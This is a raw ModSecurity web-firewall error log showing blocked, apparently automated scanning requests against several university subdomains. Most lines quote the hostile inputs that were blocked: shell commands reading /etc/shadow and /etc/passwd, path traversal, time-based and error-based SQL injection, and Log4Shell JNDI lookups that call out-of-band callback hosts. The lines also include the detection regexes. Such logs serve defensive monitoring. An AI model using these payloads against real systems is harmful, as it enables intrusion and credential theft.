[Tue Aug 29 11:34:17.414794 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAAPLwHoAAAAX"]
[Tue Aug 29 11:34:18.312913 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11SsCo-f0AAASGMusAAAAA"]
[Tue Aug 29 11:34:18.329464 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11SsCo-f0AAASEJUwAAAAE"]
[Tue Aug 29 11:34:19.308110 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAASS7-kAAAAY"]
[Tue Aug 29 11:34:19.311719 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAAPLwH4AAAAX"]
[Tue Aug 29 11:34:19.329518 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlggm7is4qxn88tr.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASK4gYAAAAI"]
[Tue Aug 29 11:34:19.329655 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASI0CYAAAAG"]
[Tue Aug 29 11:34:19.333035 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASEJVMAAAAE"]
[Tue Aug 29 11:34:19.369110 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASS7-wAAAAY"]
[Tue Aug 29 11:34:19.372824 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASI0CgAAAAG"]
[Tue Aug 29 11:34:19.374891 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgusfz7kon1oedk.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASK4ggAAAAI"]
[Tue Aug 29 11:34:19.375010 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAAPLwIAAAAAX"]
[Tue Aug 29 11:34:19.379604 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAARdiQ8AAAAK"]
[Tue Aug 29 11:34:19.393206 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlg1g7no1qw4jwgm.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASEJVYAAAAE"]
[Tue Aug 29 11:34:19.396075 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAAPLwIEAAAAX"]
[Tue Aug 29 11:34:19.399647 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAARdiRAAAAAK"]
[Tue Aug 29 11:34:19.399953 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgpftkit13cxmzy.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAAShCX4AAAAi"]
[Tue Aug 29 11:34:19.442409 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlghn7r3fa3tcxwh.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASGMvUAAAAA"]
[Tue Aug 29 11:34:20.311565 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11TMCo-f0AAASK4gwAAAAI"]
[Tue Aug 29 11:34:20.973339 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11TMCo-f0AAAPDoOcAAAAP"]
[Tue Aug 29 11:34:21.246945 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "182.1.135.185_35468770ed4f68abe5004e7b75f46e689736368e"): Internal error [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11TMCo-f0AAAPLwIQAAAAX"]
[Tue Aug 29 11:34:21.257238 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgwx7h875rhxjyj.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/login"] [unique_id "ZO11TcCo-f0AAAPLwIUAAAAX"]
[Tue Aug 29 11:34:21.426400 2023] [:error] [pid 1228] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "185.223.160.11_1759fce451e56b4eb624eea72c06ca78e73f27d0"): Internal error [hostname "informatika.unla.ac.id"] [uri "/objects/getSpiritsFromVideo.php"] [unique_id "ZO11TcCo-f0AAATMStAAAAAB"]
[Tue Aug 29 11:34:21.602888 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "69.171.249.118_b1b8a850aec98eb3184fe6a227dee75dd09e304a"): Internal error [hostname "pusatbahasa.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11TcCo-f0AAAQKOucAAAAs"]
[Tue Aug 29 11:34:21.834646 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "85.208.96.194_13a697b6c30ffc8426616729e8c141171ad52ccd"): Internal error [hostname "www.unla.ac.id"] [uri "/login"] [unique_id "ZO11TcCo-f0AAAPLwIUAAAAX"]
[Tue Aug 29 11:34:21.834726 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.16.80.17_06c6936bd2e49babc5d8cff65b916d05fe9bff95"): Internal error [hostname "unla.ac.id"] [uri "/objects/psqfy.txt"] [unique_id "ZO11TcCo-f0AAASVoI8AAAAe"]
[Tue Aug 29 11:34:22.145123 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11TsCo-f0AAASEJWIAAAAE"]
[Tue Aug 29 11:34:22.161671 2023] [:error] [pid 1229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11TsCo-f0AAATNJYQAAAAF"]
[Tue Aug 29 11:34:22.165677 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11TsCo-f0AAASEJWMAAAAE"]
[Tue Aug 29 11:34:23.248952 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAASGMvkAAAAA"]
[Tue Aug 29 11:34:23.618153 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAASPDL4AAAAS"]
[Tue Aug 29 11:34:23.720546 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASS8AkAAAAY"]
[Tue Aug 29 11:34:23.901344 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAASGMwAAAAAA"]
[Tue Aug 29 11:34:23.939730 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASGMwIAAAAA"]
